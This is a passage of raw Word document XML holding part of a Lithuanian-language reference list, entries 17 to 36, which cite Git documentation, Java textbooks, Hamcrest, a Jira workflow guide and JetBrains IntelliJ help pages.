      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">17. </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Downloads</w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId242" w:history="1">
        <w:r w:rsidR="00C749A8" w:rsidRPr="007C325D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/downloads.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C749A8" w:rsidRPr="007C325D">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">18. </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git format patch</w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId243" w:history="1">
        <w:r w:rsidR="00C749A8" w:rsidRPr="007C325D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-format-patch.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C749A8" w:rsidRPr="007C325D">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">19. </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git Basics - Getting a Git Repository</w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId244" w:history="1">
        <w:r w:rsidR="00C749A8" w:rsidRPr="007C325D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Git-Basics-Getting-a-Git-Repository.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">20. </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Git (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Getting Started - First-Time Git Setup</w:t>
      </w:r>
      <w:r w:rsidR="00C749A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId245" w:history="1">
        <w:r w:rsidR="00C749A8" w:rsidRPr="007C325D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/book/en/v2/Getting-Started-First-Time-Git-Setup.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00856425">
        <w:rPr>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">21. </w:t>
      </w:r>
      <w:r w:rsidR="004B18CF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git init.</w:t>
      </w:r>
      <w:r w:rsidR="00856425" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00856425" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId246" w:history="1">
        <w:r w:rsidR="00856425" w:rsidRPr="00856425">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-init</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00856425" w:rsidRPr="00856425">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">22. </w:t>
      </w:r>
      <w:r w:rsidR="004B18CF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git clone.</w:t>
      </w:r>
      <w:r w:rsidR="00856425" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00856425" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId247" w:history="1">
        <w:r w:rsidR="00856425" w:rsidRPr="00856425">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-clone</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00856425" w:rsidRPr="00856425">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:iCs/>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">23. </w:t>
      </w:r>
      <w:r w:rsidR="004B18CF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git status.</w:t>
      </w:r>
      <w:r w:rsidR="00856425" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00856425" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId248" w:history="1">
        <w:r w:rsidR="00856425" w:rsidRPr="00856425">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-status</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">24. </w:t>
      </w:r>
      <w:r w:rsidR="004B18CF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git add.</w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId249" w:history="1">
        <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-add</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">25. </w:t>
      </w:r>
      <w:r w:rsidR="004B18CF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git commit.</w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId250" w:history="1">
        <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-commit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00444784" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">26. </w:t>
      </w:r>
      <w:r w:rsidR="004B18CF">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git reset.</w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId251" w:history="1">
        <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-reset</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="004B18CF" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>27.Git checkout.</w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">[žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId252" w:history="1">
        <w:r w:rsidR="00E517C9" w:rsidRPr="00447D3D">
          <w:rPr>
            <w:iCs/>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://git-scm.com/docs/git-checkout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E517C9" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000F14E0" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">28. </w:t>
      </w:r>
      <w:r w:rsidR="00C34C8A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Grand, M. (2002).</w:t>
      </w:r>
      <w:r w:rsidR="00C34C8A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java Enterprise Design Patterns: Patterns in Java</w:t>
      </w:r>
      <w:r w:rsidR="00C34C8A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. John Wiley &amp; Sons.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000F14E0" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">29. </w:t>
      </w:r>
      <w:r w:rsidR="00AA42C2" w:rsidRPr="00AD4464">
        <w:t>Hamcrest</w:t>
      </w:r>
      <w:r w:rsidR="007C325D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AA42C2" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C325D" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga per internetą</w:t>
      </w:r>
      <w:r w:rsidR="007C325D">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C325D" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId253" w:history="1">
        <w:r w:rsidR="00AA42C2" w:rsidRPr="007C325D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://code.google.com/p/hamcrest/downloads/list</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000F14E0" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">30. </w:t>
      </w:r>
      <w:r w:rsidR="001C7E1D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Horstmann, Cay S. (2016). </w:t>
      </w:r>
      <w:r w:rsidR="001C7E1D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Core Java: Fundamentals</w:t>
      </w:r>
      <w:r w:rsidR="001C7E1D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. New York: Prentice Hall.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000F14E0" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">31. </w:t>
      </w:r>
      <w:r w:rsidR="001C7E1D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Horstmann, Cay S. (2017). </w:t>
      </w:r>
      <w:r w:rsidR="001C7E1D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Core Java: Advanced Features</w:t>
      </w:r>
      <w:r w:rsidR="001C7E1D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>. New York: Prentice Hall.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000F14E0" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">32. </w:t>
      </w:r>
      <w:r w:rsidR="00253DF5" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Idalko (2018). </w:t>
      </w:r>
      <w:r w:rsidR="00253DF5" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A guide to Jira workflow best practices (with examples)</w:t>
      </w:r>
      <w:r w:rsidR="00253DF5" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId254" w:history="1">
        <w:r w:rsidR="00253DF5" w:rsidRPr="007C325D">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.idalko.com/jira-workflow-best-practices.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00253DF5" w:rsidRPr="007C325D">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001804F3" w:rsidP="00372B3A">
      <w:r>
        <w:t>33.</w:t>
      </w:r>
      <w:r w:rsidR="00B820EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A4256B" w:rsidRPr="00AD4464">
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidR="007C325D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B820EE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Prieiga</w:t>
      </w:r>
      <w:r w:rsidR="00B820EE">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C325D" w:rsidRPr="00EE59B3">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>per internetą</w:t>
      </w:r>
      <w:r w:rsidR="00A4256B" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A4256B" w:rsidRPr="007C325D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId255" w:history="1">
        <w:r w:rsidR="00A4256B" w:rsidRPr="007C325D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>http://www.oracle.com/technetwork/java/javase/downloads/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">34. </w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrains s.r.o. (2019). </w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Learn and Support</w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId256" w:history="1">
        <w:r w:rsidR="001C7EF8" w:rsidRPr="007C325D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:u w:val="none"/>
            <w:lang w:eastAsia="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/idea/documentation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="007C325D">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00B820EE" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="006400"/>
          <w:u w:val="single"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">35. </w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Configuring Project and IDE Settings</w:t>
      </w:r>
      <w:r w:rsidR="001C7EF8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId257" w:history="1">
        <w:r w:rsidR="001C7EF8" w:rsidRPr="005C46E4">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.jetbrains.com/help/idea/configuring-project-and-ide-settings.html.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00602F92" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="006400"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>36.</w:t>
      </w:r>
      <w:r w:rsidR="00B956A6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">JetBrain (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00B956A6" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
